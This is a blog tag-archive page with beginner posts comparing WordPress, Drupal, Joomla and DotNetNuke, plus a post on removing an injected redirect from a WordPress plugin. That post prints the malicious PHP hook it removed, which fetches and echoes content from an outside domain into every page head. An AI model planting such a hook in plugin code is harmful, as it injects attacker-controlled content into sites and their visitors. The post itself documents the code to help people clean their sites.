Tag Archives: php

Building a website, the easy way

notepad_edit

I remember when I first started working on websites, the only program I used was the default basic text editor in Windows 98/Plus, Notepad. For me it was easy to create a website with HTML tags and such, but as some of you remember in the old days most websites were plain and simple (yep, there are still websites like that). Other than companies like Sun Microsystems, IBM, Apple and Microsoft, not many websites were “pretty” to visit. The Internet technology has came a long way with the rapid growth in web based technologies during the infamous dot-com bubble. This has open up new possibilities for the average consumer, otherwise redistricted to large companies. Content Management Systems or simple CMS programs are the best thing happen since the discovery of the number-pi (π). 🙂

Skip Tech Jargon

Content Management System (CMS)

It is a piece of software that installs on a web server that can be used either internally or globally for communication. They are much like email programs, except they manage HTTP content. What is HTTP content? Well, to put it simply, the HTTP stands for Hypertext Transfer Protocol. It is like English language that we use to communicate to each other. While English may not be understood by everyone, HTTP language is standard on almost all web servers. There are many others and variations such as HTTPS, FTP, SSH, etc still in use today but to keep this article as simple as possible, I would avoid talking about them.

Anyway, in the old days you have to type each and every code using a program like Notepad or later Notepad++, HTML-Kit and other more evolved editing software. These files are saved with either dot-htm or dot-html extensions. The tides have changed when a new language called, PHP (Hypertext Preprocessor) was instructed in 1995. It is what we called a server-side scripting language specifically designed for web development, but later spread into other areas. Again, I don’t want go into much details, check out Wikipedia if you really want to how it works. With PHP we can do things differently to benift the average user. With PHP, the CMS has gone into overdrive because it allowed the programmers to develop back-end codes for general public use. For example, you can create a web page and attribute different conditions just by choosing from a list of items (I will talk about Categories and Tags in WordPress later). This is why using a CMS makes building websites as easy as ABC.

It is easy to make a website

By using CMS programs, anyone can build a website within an hour (not talking about large scale content with millions of pages here!). However, it all depends on the decisions you take at the very beginning. If you have limited knowledge with web development, I recommend you use a simple to use CMS like WordPress. In fact, the best CMS for beginners in my personal opinion is WordPress. There are many argumentative articles on the web for or against one CMS program over the other, but even the opponent of WordPress would agree that it is the best stepping stone into the world of HTTP over much more complex CMS like Drupal or Joomla. I will explain why in a bit. But let me introduce you to WordPress.

wordpress WordPress is/was designed for blogging as an open source CMS. Open source means that the code goes into development will be publicly available to others. Because it is open, it grew in popularity among professional bloggers. As it grew in polarity so is the amount of add-ons known as “Plugins” which extended the customization abilities. It comes with a well organized graphical interface and a large community of supporters for those of you who are new to web development field. To get access to this program, you will most likely have to choose a hosting service provider with WordPress scripts/program support. Shop around and Google is your friend. However, be careful of choosing bad hosting companies like GoDaddy. Just because of a company spend money on advertising doesn’t mean they are good at providing the service. I am satisfied with my host, HostGator, but I cannot promote any one of them, because I want you to choose for yourself. The other option is installing the WordPress script on your own server. Well, if you have a web server, you shouldn’t be reading this article! The software itself is free.

How to use it?

Since there are well written documents on usages, I don’t see the point of publishing the same thing over and over. So please read New To WordPress – Where to Start on the official site. If you are a visual person, please try YouTube. It is very easy to follow and if you would like me to explain something here, please contact me with your questions.

Drupal, Joomla, DotNetNuke and the list goes on…

Uh… I don’t want to go into those deep philosophical and analytical arguments. I wrote this article for novice users. Yes, I have used every single one of them and I am more of an expert on Drupal and WordPress. I found Drupal, Joomla, DotNetNuke and others as great CMS programs with very good possibilities. But the learning curve for someone who is new to web publishing it can be overwhelming.

I am not the only one who thinks this way. In fact, the Drupal developers have recognized the “problem” (I don’t think Drupal has a problem) so they are trying to close the gap between WordPress and Drupal usability. This is obvious on their new version Drupal 7 release this year. If you look at the standard costs associated with building and managing a website, most web design companies change more for Drupal based sites than for WordPress bases sites. Most large companies and organizations like University of Calgary and White House (Government of USA) use Drupal. However, I do not buy into the argument that Drupal is safer than WordPress. It is not the WordPress that can harm your site, it is the plugins and themes which can cause problems. As long as you use well written themes like Graphene (Developer) and well written plugins (even official ones like JetPack you will be fine. Make sure you keep the CMS and everything script (plugins, etc) up to date by installing updates regularly.

Joomla also have a huge downfalls for average users. I found their updates to be erratic and usability is far worst than even Drupal. DotNetNuke is based on the .NET framework, open source and it only runs on Microsoft Windows environments. Not many service providers would be happy to go with a Microsoft Windows servers without asking you to pay for a premium. Even for me, it cost me more than $500 (Canadian) to get my hands on Windows Server software for my home unit with a student discount. I despite Microsoft’s (and Apple) for being such cry babies. I would not recommend DotNetNuke to anyone.

There are reasons why you would choose a CMS like Drupal. But I am not going to go into detail on that, other than to say, if you require a complex website with advanced user management, Drupal is probably the best. DotNetNuke is best for Windows Server environments while others will run on open source server operating systems.

Last word on ethics of the Internet. Respect others by avoiding copying contents from sites and posting as yours. Happy blogging and keep the Internet safe for EVERYONE!

Fix your site from unauthorized redirect

Recently I added a plug-in outside of the WordPress repository. To my horror, one of the files had a malware code inserted into the the “head” tag. The bad guys are so cleaver that they made their code to run randomly so it will not be detected by the web developer as soon as they install these bad plug-ings. So how do you know you have problems in your installed scripts? How do you go around fixing them? The answer to the first is that you probably won’t know until a visitor to your site or yourself come across it. But if the bad guys are into stealing information such as credit card data, you may be out of luck.

I am going specially target one of the malware injection which can be detected by anyone; the automated redirection. The automated redirection is used to direct your visitor to whatever the website the guys want promote. Most of the time they are either directed to survey sites, illegal websites such drug trafficking and/or pornographic sites. Regardless of your moral values, the major issue here is these scripts will not provide you with an option to disable and/or modify their behaviors. That’s where programmers like us come into save your site!

I end up with redirection to unknown website once in a while I try to view my web site. So, I dig around and found that a function called wp_head() in one of the PHP files are used as a backdoor to inject a questionable code in UberMenu plug-in. I used the Editor in WP administration page to delete the function completely in TipTour.class.php file (file with this function). The code I removed was;
function wp__head() {
if(function_exists('curl_init'))
{
$ch = curl_init();
curl_setopt($ch,CURLOPT_URL,"http://www.jqury.net/?1");
curl_setopt($ch, CURLOPT_REFERER, $_SERVER['HTTP_HOST']);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,"10");
$data = curl_exec($ch);
curl_close($ch);
echo "$data";
}
}
add_action('wp_head', 'wp__head');

Protect yourself

If you find something wrong with your plug-in or you find an odd behavior, contact the developers as soon as possible. If you do not know who to contact for help, try using one of the free web site scanners, which also can come in as a plug-in, website or both. In addition, if there is an option to download a any add-on to your servers directly from either the CMS developers or from the add-on/plug-in developer, please use their resources. You should also scan any externally loaded files to your web server through a virus scan before installing on your http/www folders. After installing anything, check the folder and file permissions using FTP or cPanel (or such programs) for 777 permissions. If you find any permissions has been changed to 777, immediately change the permissions manually (USE CAUTION: It may break your website!). Go to SQL/MySQL administration panel and check for injection scripts and if you find them copy the file first and then delete them. Report such injections to the developers with the information on the copies injected file.

Always remember this is not limited to a single CMS. In fact, any website even without the use of a CMS could end up becoming a victim. However, since CMS programs are very popular among web developer and used by even government agencies such as whitehouse.gov and ucalgary.ca (Drupal), bad hackers are increasingly targeting CMS based websites.

Installing MySQL Databases using SQL files

It can be a daunting task to create SQL databases when you are running your websites without any professional help. For most small businesses, it is a waste of money to hire a web developer to work on all the areas of a website. If you can follow instructions Continue reading Installing MySQL Databases using SQL files

Introduction to writing a WordPress plugin

If you step into the web development world using HTTP (Hypertext Transfer Protocol) language, almost every file you created in “those days” must be in .html or .htm format. the Internet WWW (World Wide Web) infrastructure has changed at a rapid rate since the introduction of standardized HTTP language.

Skip Tech Jargon

Without a header, it is just a code file.

This is because the limitations Continue reading Introduction to writing a WordPress plugin